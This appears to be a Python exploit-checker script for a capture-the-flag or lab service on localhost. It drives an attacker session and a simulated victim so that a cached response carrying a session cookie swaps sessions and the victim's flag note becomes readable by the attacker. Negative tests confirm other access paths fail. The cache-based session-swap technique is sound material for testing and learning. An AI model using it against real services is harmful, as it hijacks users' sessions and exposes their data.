import requests
import sys
import json
import time
# Base URL of the service under test.
BASE = "http://127.0.0.1:9090"
#BASE = "http://localhost:5000"

# Name of the cookie that carries the session.
COOKIE_NAME = "session"

# Marker value the victim writes into mission notes; the assertions below
# look for it in responses.
FLAG = "FLAG{TESTVAL}"

# Every request in this file is sent through this HTTP proxy, so credentials
# and FLAG pass through whatever listens on localhost:8080.
# Use the commented-out `proxies = None` line below to connect directly.
proxies = {"http": "http://localhost:8080"}
#proxies = None
def do_victim():
    """Play the victim: log in, visit every mission, and post a note with FLAG.

    After each mission-info request a note containing FLAG is posted. The
    note lands in the victim's own mission unless the session cookie was
    replaced by a recently cached response. For missions whose name starts
    with "imgs" the function asserts that the cookie did change.
    """
    # Victim logs in and we remember the cookie issued at login.
    s_victim = requests.Session()
    login(s_victim, "Mr. Y", "b")
    cookie_victim = s_victim.cookies[COOKIE_NAME]

    # Victim loads the mission list; the scenario expects at least four.
    missions = get_missionlist(s_victim)
    assert len(missions) >= 4

    # NOTE(review): the listing's indentation was lost; the POST is placed
    # inside the loop because the original comment says a POST follows each
    # mission-info request. Confirm against the original file.
    for mission in missions:
        name = mission["name"]
        print(f"\t.. getting missioninfo for {name}")
        get_missioninfo(s_victim, name)

        cookie_now = s_victim.cookies[COOKIE_NAME]
        if name.startswith("imgs"):
            # The session cookie must have been swapped by this response.
            assert cookie_now != cookie_victim
        #else:
        #    assert s_victim.cookies[COOKIE_NAME] == cookie_victim

        # POST the note under whatever session cookie is now in the jar.
        add_data(s_victim, f"We have a mission {mission['name']}. Statusupdate: {FLAG}")

    logout(s_victim)
def test_directaccess():
    """Check that another mission's own login and secret do not expose FLAG.

    Logs in as "Mr. R", reads that mission's data with its secret, and
    asserts that FLAG is absent from the response body.
    """
    session = requests.Session()
    login(session, "Mr. R", "a")
    response = get_data(session, "a")
    body = response.content.decode()
    assert FLAG not in body
# To get the flag, we want to enforce knowledge of the password;
# otherwise, you could simply take the victim's cookie and retrieve the flag
# without creating your own mission.
# This test tries exactly that.
def test_nopwd():
    """Check that a swapped session cookie alone is not enough to read data.

    Logs in as "Mr. R", requests mission info for "imgstest", and asserts
    that the session cookie changed. A get_data call without a secret must
    then answer 400 and must not contain FLAG.
    """
    session = requests.Session()
    login(session, "Mr. R", "a")
    cookie_before = session.cookies[COOKIE_NAME]

    get_missioninfo(session, "imgstest")
    cookie_after = session.cookies[COOKIE_NAME]
    assert cookie_before != cookie_after  # Changed cookie

    # No secret is supplied: the request is expected to be rejected.
    response = get_data(session)
    assert response.status_code == 400
    assert FLAG not in response.content.decode()
def login(session, mission, secret):
    """POST the mission name and secret to /api/authenticate.

    The response is not inspected here; callers read the session cookie
    from ``session.cookies`` afterwards.
    """
    credentials = {"mission": mission, "secret": secret}
    session.post(f"{BASE}/api/authenticate", json=credentials, proxies=proxies)
def logout(session):
    """Send a GET to /api/logout on the given session; the response is ignored."""
    url = f"{BASE}/api/logout"
    session.get(url, proxies=proxies)
def get_missioninfo(session, mission):
    """GET /api/missioninfo/<mission> on the given session.

    The response body is discarded; the call matters for the cookies the
    response may set on ``session``.
    """
    url = f"{BASE}/api/missioninfo/{mission}"
    session.get(url, proxies=proxies)
def get_missionlist(session):
    """GET /api/missions and return the decoded JSON body."""
    response = session.get(f"{BASE}/api/missions", proxies=proxies)
    return response.json()
def add_data(session, data):
    """POST ``data`` as a note to /api/add_data; the response is ignored.

    The note is stored under whatever session cookie ``session`` currently
    holds.
    """
    note = {"data": data}
    session.post(f"{BASE}/api/add_data", json=note, proxies=proxies)
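def get_data(session, secret=None):
    """POST to /api/get_data and return the raw response.

    Args:
        session: the ``requests.Session`` whose cookies identify the caller.
        secret: optional mission secret; when given it is sent as the
            ``secret`` field of the JSON body, otherwise the body is ``{}``.

    Returns:
        The ``requests`` response object, so callers can check both the
        status code and the content.
    """
    payload = {}
    # Identity comparison: None is a singleton, and `!= None` can be
    # overridden by an argument's own __ne__.
    if secret is not None:
        payload["secret"] = secret
    return session.post(f"{BASE}/api/get_data", json=payload, proxies=proxies)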
# Main scenario. The statement order is the test: the attacker session is set
# up first, the victim runs second, and the attacker's data is read last.
# NOTE(review): the scenario depends on a cache replaying a response that sets
# the session cookie (see the comments in do_victim); presumably the service
# under test is deliberately vulnerable. In a real deployment, responses that
# set cookies are normally kept out of shared caches (e.g. Cache-Control:
# no-store or private). Confirm against the cache configuration.
# Sessions
s_attack = requests.Session()
# Attacker logs in, get cookie
login(s_attack, "imgstest", "d")
# cookie_attack is only referenced by the commented-out assertion below.
cookie_attack = s_attack.cookies[COOKIE_NAME]
# Attacker loads his own missioninfo
get_missioninfo(s_attack, "imgstest")
#assert s_attack.cookies[COOKIE_NAME] == cookie_attack # this fails when the test is run the second time before the cache expired
# Run the victim flow; it posts notes containing FLAG after each mission-info request.
do_victim()
# Verify data in attacker
data = get_data(s_attack, "d") # get_data, but the s_attack session now has the s_victim cookie
# The scenario passes only if FLAG shows up in the data readable with the
# "imgstest" secret; on failure the message prints the body that came back.
assert FLAG in data.content.decode(), f"content is {data.content.decode()}"
logout(s_attack)
# further tests
# Negative checks: FLAG must not be readable through another mission's login,
# nor with a swapped cookie when no secret is sent.
test_directaccess()
test_nopwd()